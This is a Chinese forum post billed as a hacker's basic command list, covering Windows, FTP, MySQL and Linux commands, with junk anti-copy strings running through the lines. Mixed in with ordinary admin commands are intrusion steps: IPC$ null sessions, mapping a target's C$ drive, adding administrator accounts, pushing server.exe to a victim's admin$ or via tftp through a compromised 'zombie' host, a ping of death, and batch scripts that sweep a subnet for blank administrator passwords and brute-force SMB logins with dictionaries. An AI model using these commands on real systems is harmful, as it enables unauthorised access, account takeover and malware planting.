黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接
$ M5 R- D  c8 a/ v7 h  `net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接 # ?: V/ h. d: b( {/ y
net use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H:
- S' D2 i# G: L3 n7 Fnet use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: ' Z- |: x5 `2 l
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 6 c& t$ n% U2 r/ |' `% d4 |
net use h: /del 删除映射对方到本地的为H:的映射 % E9 k, Q# V8 Z6 W0 @' h0 t0 d
net user 用户名　密码　/add 建立用户
: C8 D& S" _* @& o8 u9 o  Vnet user guest /active:yes 激活guest用户 7 U# E" x+ p$ {" m+ O; i
net user 查看有哪些用户 2 x  U( G. M3 F/ O
net user 帐户名 查看帐户的属性 # j0 l& k8 L8 ^$ X6 T
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
% }; O! G) I# c6 t( v' k- o+ Mnet start 查看开启了哪些服务 % n. O7 J  i! |5 S
net start 服务名　 开启服务；(如:net start telnet， net start schedule) : j" B  x6 Y% h  h4 J6 {& V/ m
net stop 服务名 停止某服务
. I- f, o; R/ y0 W4 S) z4 ~8 s3 qnet time \\目标ip 查看对方时间
6 i% L* S1 V0 b; \7 Dnet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
$ F9 @# ?6 c& q! F" ynet view 查看本地局域网内开启了哪些共享 1 I8 n5 b8 C& B. s0 @
net view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享
( r& y: G" J0 R+ [( x$ }" P, G- S+ unet config 显示系统网络设置 ! E9 S1 n# w2 E: l" b, C. u% u2 m
net logoff 断开连接的共享 9 d7 Z8 `. Y* ~& D! ?
net pause 服务名 暂停某服务 # r7 e. J3 k( T& x0 p" @" G4 S
net send ip "文本信息" 向对方发信息 2 v: M/ [1 ?; L
net ver 局域网内正在使用的网络连接类型和信息
' k' R2 R6 e4 |, }. k6 n; J' ^net share 查看本地开启的共享 4 x. X/ c9 Q8 k/ q) x3 b4 L# K( H
net share ipc$ 开启ipc$共享 8 {" J8 @) J, w5 e2 v& ]9 X) d
net share ipc$ /del 删除ipc$共享
- y" j5 Q* C. c9 a6 J1 f8 u' enet share c$ /del 删除C：共享 9 A" g9 [5 C2 R+ F" k
net user guest 12345 用guest用户登陆后用将密码改为12345
) f+ F, W) f( @6 ?net password 密码 更改系统登陆密码 8 z4 }) n5 V0 q, A- N
netstat -a 查看开启了哪些端口,常用netstat -an " k* a0 }! v7 f) q; `/ r/ I
netstat -n 查看端口的网络连接情况，常用netstat -an / _3 k4 ~; O( [; s2 o
netstat -v 查看正在进行的工作 + U, T+ t$ f% Q! v
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况）
8 g1 @' E* o2 N0 S4 A6 N$ Inetstat -s 查看正在使用的所有协议使用情况 - Y; I6 V3 D& o: e( R* T. `
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写
1 ~6 g0 _. Q( E' Utracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。 % ~$ F9 l4 ~+ N& ~
ping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。 0 ?# e: Q- c1 {: u, I4 d& _$ W3 P
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
! w. f: E2 i* R, u& z& ripconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息 - a' h$ V* C# }# n1 a4 V* a
tlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) 1 j' C+ ?9 ~  I7 |) _
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) ; W! V) u! n4 L8 B" @
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件   d5 L1 O: S* n* i+ b
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） 5 L, g: M! r# n$ A
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
& L& A5 ~4 u/ `+ |3 z$ w% h8 Pfc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令 * Q( R* s: T$ ?  T
at id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
) A! N5 z1 k: `- E5 v. M0 eat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
/ I  N' k8 g) ~1 F5 l. b! ]at id号 /delete 停止某个已注册的计划任务 + ~* y' c1 h# c# m
at 查看所有的计划任务
  i# {7 K, l; s" z2 J2 j# c! eat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
& l  j  F( J3 }7 b  Xfinger username @host 查看最近有哪些用户登陆 2 ]. B$ `- C* @5 l! x! I9 i
telnet ip 端口 远和登陆服务器,默认端口为23
) v5 w1 }+ Y& S! T" X0 i2 ?' Wopen ip 连接到IP（属telnet登陆后的命令） & J2 F& W7 F0 T" H9 l; v
telnet 在本机上直接键入telnet 将进入本机的telnet 2 a- S6 e( l2 B3 r
copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件
4 B! k4 `, ?. ]' u0 rcopy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下 $ w6 Q- y; X. ~0 o9 ]! L- D& l
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
% z$ I- ^# n6 Ocopy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
  R$ Y: w) G; ^4 Y0 V; Jxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件 ; Y: b+ ?1 @- Q0 z, t
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送
: P+ j4 i( s, `tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 - r4 |( M% }; p' J1 T0 o  m7 p
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) ; u+ W6 B7 _* r, s  g" `( H2 E2 R
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
2 B5 H# L6 g+ w! l) Karp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 0 Z# d5 h& B0 F) ^
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令
( y. [( U5 Q. b8 Nmem 查看cpu使用情况 - E5 \3 b8 K- [. {& }
attrib 文件名(目录名) 查看某文件（目录）的属性 # k) r3 W! Z4 w2 U
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性
' m# O, x2 J) M$ Hdir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间   z0 b, u5 q7 D; Q" B# i, k6 T
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
8 q5 n) ~9 A2 Z( l6 |) v, \set 指定环境变量名称=要指派给变量的字符 设置环境变量 : _! ?! e/ H$ m1 v0 N2 C+ o4 [
set 显示当前所有的环境变量
8 K" ]' v/ X! Y  Mset p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
  s4 [) n- N6 W# K1 bpause 暂停批处理程序，并显示出：请按任意键继续.... % H5 V/ \" h. `& t% n3 ?6 h
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
. W' M1 e6 n/ @+ Lgoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） ! b2 u+ `! f& C7 D. Q
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
$ {: S( P( U, ^- A& Pfor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）
" y& i9 ]8 G. L* t; Fecho on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
+ C% m2 L1 W3 i0 w2 {# c/ R# z) r) pecho 信息 在屏幕上显示出信息
7 I0 j% U  F) ]) ~4 J9 jecho 信息 >> pass.txt 将"信息"保存到pass.txt文件中 . _. H1 c( E/ y3 h7 E
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
$ X, B  E, F9 K) F5 d. rfind 文件名 查找某文件
$ u( p% o* W5 M0 S, jtitle 标题名字 更改CMD窗口标题名字 : u- h. Z7 m$ M& @5 z
color 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
* J+ K" z4 I# {5 D9 Bprompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
2 Y+ `  L) X1 \: q* B- @3 Dprint 文件名 打印文本文件 ! u8 ]) c3 `$ @9 c5 b( e: w
ver 在DOS窗口下显示版本信息 2 B7 c6 W: M6 |' x% I
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）
8 w1 [, W7 q0 d3 l  m# `format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
+ X" C3 F' o4 w+ Tmd　目录名 创建目录
$ Z& A$ A4 o) ~2 [& n4 treplace 源文件　要替换文件的目录 替换文件 6 Y- x" P+ E; {- i
ren 原文件名　新文件名 重命名文件名
, T% v$ n- q7 Y- i5 v, S7 E. i+ G" ytree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称 & e% q; b- D, y+ X4 _
type 文件名 显示文本文件的内容
$ F1 D6 A. _9 F# bmore 文件名 逐屏显示输出文件 % i' X& b3 X0 n6 ?
doskey 要锁定的命令＝字符
7 S& z7 j9 w0 l& r$ d0 F1 h0 Pdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir=
# W9 \  I; I: O0 Mtaskmgr 调出任务管理器
; Q- p  H! Y. c0 k5 B: Zchkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误 - ]' ]3 b, Z7 g7 W  l7 d1 p
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
' _) ~) x- Q- P) ?( |exit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
( Y4 \) F  A  z, A- S. p5 Cpath 路径\可执行文件的文件名 为可执行文件设置一个路径。
0 d1 H$ F% z7 Y. n, j( rcmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /?
9 _' W. o( k1 S7 U1 j4 E/ Eregedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
8 i1 i5 h8 U- W) Zregedit /e 注册表文件名 导出注册表 8 g( `2 o8 y$ I" M# X
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
4 n2 ^$ \$ k4 Q0 _+ q  I' M# }cacls 文件名 查看文件的访问用户权限列表 ! d$ F2 ~& ?0 G1 o4 b
REM 文本内容 在批处理文件中添加注解 : R& g& l% i, [9 A) N: m
netsh 查看或更改本地网络配置情况
7 s* r9 j3 B/ B, @IIS服务命令：
* f* y1 @6 G- {1 O6 Niisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） ; r  p; i5 ^6 I* A
iisreset /start或stop 启动（停止）所有Internet服务
2 d( m; R! d5 ]iisreset /restart 停止然后重新启动所有Internet服务 ) E7 V4 h5 q2 O& b; a
iisreset /status 显示所有Internet服务状态 # A  R9 }% C% I5 p6 P; |
iisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
4 D6 ~" j% ]% @7 T5 k8 i5 @6 @iisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机 : h" X% L1 s  C' f+ p+ W  N% i
iisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务 , I! i: ~8 I  [' n5 a" c
iisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。 . W) r2 W5 w1 Y  r( \# @, j( K
FTP 命令： (后面有详细说明内容) ) D3 P) O) w# G" c, v
ftp的命令行格式为:
/ V% H7 }9 F. [! q! vftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。3 K# W  b* D6 `" ^: G
－d 使用调试方式。 4 Q. O" c8 F7 C) Z/ m: B1 W8 k
－n 限制ftp的自动登录,即不使用.netrc文件。
( @7 ?+ _; q# K－g 取消全局文件名。
# h, l7 C( k) `help [命令] 或 ？[命令] 查看命令说明 1 b  w) b( @7 v. m
bye 或 quit 终止主机FTP进程,并退出FTP管理方式. 6 `5 I  U4 Y$ a& V
pwd 列出当前远端主机目录
5 t6 W; Z. B+ cput 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 + H8 P) W/ `5 K5 ^  M
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中
: T, w9 p: h% q7 t) R8 Bmget [remote-files] 从远端主机接收一批文件至本地主机
# }' J$ e9 v5 C# Emput local-files 将本地主机中一批文件传送至远端主机 ! Y7 Q# G* T* E: R0 {: Y
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件 & \% b) o: K1 Z6 L. {# d
ascii 设定以ASCII方式传送文件(缺省值) & V' m$ `; q6 k6 U/ v, d, G
bin 或 image 设定以二进制方式传送文件
- L! `$ V, [* R% p, C$ h: E1 Abell 每完成一次文件传送,报警提示 9 K" ~1 |+ D7 K
cdup 返回上一级目录
- u. b. I0 C! n$ ?: A# ^close 中断与远程服务器的ftp会话(与open对应)
/ }5 R* A# ]' S; U( J) a( P( F  C2 Popen host[port] 建立指定ftp服务器连接,可指定连接端口 8 T2 u1 b) o& c8 y9 X+ u
delete 删除远端主机中的文件
/ X$ D% W9 O4 m* |/ qmdelete [remote-files] 删除一批文件 ' l8 y9 C. ^9 G% T' ^7 k& l
mkdir directory-name 在远端主机中建立目录 - l3 ?7 V7 M5 L0 Y$ V: ~
rename [from] [to] 改变远端主机中的文件名 : _" T, f+ Y# a1 G' q1 i1 N
rmdir directory-name 删除远端主机中的目录
3 |* H! j2 Q0 A2 N* f  rstatus 显示当前FTP的状态 3 Q  {- P1 m7 X1 P3 P
system 显示远端主机系统类型
9 Z. _* x1 f3 T) W4 x! Guser user-name [password] [account] 重新以别的用户名登录远端主机
: j9 f3 b; ]# o0 P! f$ N" I; xopen host [port] 重新建立一个新的连接
: }* R6 T0 i! d/ j  ~6 t1 aprompt 交互提示模式
7 E2 m' m% g8 @! T& E- }8 R' Amacdef 定义宏命令
6 Z! j% n. u) ~: Hlcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 0 g& v, l' Y! G$ \: q
chmod 改变远端主机的文件权限 8 a; E* _4 b9 H& X% w6 |
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母
/ [0 G9 O/ K$ ccd remote－dir 进入远程主机目录
; T+ b( P9 k9 j% l; u/ |cdup 进入远程主机目录的父目录 : G2 L% W  h- c- K
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip
' s) s- d/ @9 n! G4 i% e/ e7 @4 g/ xMYSQL 命令： - K/ v' k$ l5 X$ i: I7 Y# q( W
mysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
8 U  v3 \& n& G% t& O8 G8 a（例：mysql -h110.110.110.110 -Uroot -P123456 " D9 s# ]2 u+ v3 s- P+ l
注:u与root可以不用加空格，其它也一样） & \8 h% U3 U6 I; ]$ E9 z$ h
exit 退出MYSQL
6 m) m3 ]% q: v  Z. o/ |* emysqladmin -u用户名 -p旧密码 password 新密码 修改密码 3 A/ @% h5 v* I+ Q" F$ P2 C8 g
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） 2 V/ z* P6 V# S1 v
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。
0 g$ U$ T8 j8 K* o/ Nuse mysql；* k5 W+ f+ g: Q3 Q* [: a
show tables; 显示库中的数据表 ! C! g- R% J) t$ ?  J
describe 表名; 显示数据表的结构
; y- @8 a6 a' ccreate database 库名; 建库
: n; F! _/ G! r1 j0 q. |! y8 juse 库名；
7 u. J# K& g2 {" icreate table 表名 (字段设定列表)； 建表
0 [; `: B2 B& C5 gdrop database 库名;
9 }4 L) P( x( h/ C& q0 D0 jdrop table 表名； 删库和删表 * M3 ?; t. c$ n/ }
delete from 表名; 将表中记录清空   K# i+ S& t2 |  s$ l
select * from 表名; 显示表中的记录 # I! A! `: _. W; h/ \
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
- x- I) x% k; I& h4 Swin2003系统下新增命令（实用部份）：
5 e& g9 ]8 W4 g& B) Ashutdown /参数 关闭或重启本地或远程主机。3 S$ i% j& `1 g- q4 G
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
0 B8 L/ ~' E9 h8 |* R例：shutdown /r /t 0 立即重启本地主机（无延时） ! U. Y: @! V2 m' `
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。+ Y- W" d: z* o' [: f
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
6 Y3 i. O- `7 H) f+ htasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。
) O6 p2 ?; ^& T$ q+ I8 b  \4 s参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程( V7 q. ?. w1 w% ]. C
Linux系统下基本命令： 要区分大小写! l" B  {/ X3 V. \
uname 显示版本信息（同win2K的 ver） 0 `( h# Q# z6 _  E% a
dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir）
/ n% E% \$ {$ P8 ~  i+ k0 |pwd 查询当前所在的目录位置 ! {) p. C& f9 F. i8 h2 k
cd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。 ( j, {: p3 R: n, |8 J8 a: X
cat 文件名 查看文件内容 9 }; }" Y: y  o+ j& n  A$ {
cat >abc.txt 往abc.txt文件中写上内容。
; c0 E9 s/ k' v! }$ Smore 文件名 以一页一页的方式显示一个文本文件。 6 N% [; S) x6 m! |
cp 复制文件 9 `/ E. a/ k9 }! P4 m& c
mv 移动文件 $ h" b  }9 p, B0 a9 R8 w9 E
rm 文件名 删除文件，rm -a 目录名删除目录及子目录   @4 g* d2 ~0 x2 U6 K/ D& A0 u
mkdir 目录名 建立目录 . X$ j% E2 x9 W  c0 q( |) ~3 H
rmdir 删除子目录，目录内没有文档。 / F0 W# K9 }: w  o# d! n9 M
chmod 设定档案或目录的存取权限
& m" B! \4 q9 K3 A$ ngrep 在档案中查找字符串
6 \; n: G7 L1 a  G- I0 jdiff 档案文件比较
% I$ s" E9 K& m' B! a7 v3 Z4 [find 档案搜寻 & a8 B# G" r! o2 [" Z  e! P
date 现在的日期、时间
  D" T( ~/ W* T5 r  `who 查询目前和你使用同一台机器的人以及Login时间地点 * Y4 J# [: j: g
w 查询目前上机者的详细资料 8 w6 L% w3 Q6 W1 E2 x
whoami 查看自己的帐号名称 . v- a0 A2 A0 ~% V& c; p4 }9 T
groups 查看某人的Group ) W! a8 _6 r$ Q1 @! k
passwd 更改密码   }; G. L2 b4 O  n* a
history 查看自己下过的命令 - q* Z6 v2 A' g/ Y
ps 显示进程状态
- K1 Y6 f! Y! Akill 停止某进程
; D1 \$ g: P4 n. e; i6 A  `gcc 黑客通常用它来编译C语言写的文件 ( ^% K/ r9 Q9 @$ T/ C4 @6 e. G. J
su 权限转换为指定使用者
$ `  k$ T# d3 h1 j0 Gtelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
& R1 p5 B: P  y& O5 \% x# xftp ftp连接上某服务器（同win2K
- J- ?$ }1 ?- J1 v附：批处理命令与变量7 a& }: R% K% y+ _
1：for命令及变量 基本格式：
$ G' _9 v& N3 [- R$ i" q9 qFOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。
5 q( O: G' C* x5 O% _# R批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
. _3 f% i1 n+ ~$ }$ p4 V" d& j, C$ i(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}! f& p0 _7 W, M: [# m! _. [; E
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开" O/ D; t/ W( z! `9 L- t
command_parameters：为特定命令指定参数或命令行开关, S8 ?# B* p6 ~
IN (set)：指在(set)中取值；DO command ：指执行command
' x: {3 x& \, c0 a& g  }6 y参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
2 N) u3 y* G, R3 D- U% L用法举例：
& j" I7 j2 c) c0 L0 f2 s@echo off $ c; A2 Q: d1 ]" J2 u- g, _5 l8 z4 A
echo 用法格式：test.bat *.*.* > test.txt / i( \, }) @, |8 q* n# \% q" w/ D( Q
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt
  I1 T1 r7 T+ h: e. Z& ]存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。
% x% Y, S8 C7 D4 p9 L. V) b/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。 + }0 T. T7 H& U, U
@echo off
" e* I6 U. G. l- E3 p) ?7 Z. B! recho 用法格式：ok.bat ip 7 G- q3 Z. L! Y& k3 o! F* p
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200
. U/ a3 W5 ?! \) U+ D$ Z存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。
  D* P% c# d- c, K6 W2：if命令及变量 基本格式： # n7 V5 k2 B* M+ E2 A! l
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
, ?5 s2 C$ Y8 c& M4 K: m  W2 D7 b例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。& b3 N% q1 H2 {4 {& Z5 w
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
) T/ H0 @6 L0 M! dIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。+ _( P9 R0 i4 n3 K4 g; ?. K+ i
例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "） ) J, s# |' W6 }  A% q2 h' B8 |$ s5 n$ U
IF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。$ V; X8 D: ~. u% K1 E- M
例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
8 ?4 m' r# v! G# s! F, L1 \IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”